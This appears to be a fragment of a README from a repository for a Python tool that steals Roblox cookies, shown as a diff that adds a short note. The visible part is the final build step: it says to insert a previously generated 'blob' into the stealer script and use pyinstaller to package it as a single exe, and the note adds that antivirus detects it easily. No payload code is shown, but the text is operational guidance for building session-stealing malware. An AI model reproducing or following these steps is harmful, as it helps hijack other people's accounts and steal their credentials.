YellowSnowEater/Python-roblox-cookie-stealer/readme.md

 ## 3: Final script

 Copy the blob from before and put it into the stealer script. once you have done this you have a functional python file.
 If you want to get an exe use [pyinstaller](https://pyinstaller.org/en/stable/) (pyinstaller Stealer.py --onefile)

+## Note

+Not very efective for inproper use; It gets detected by antivirus easily.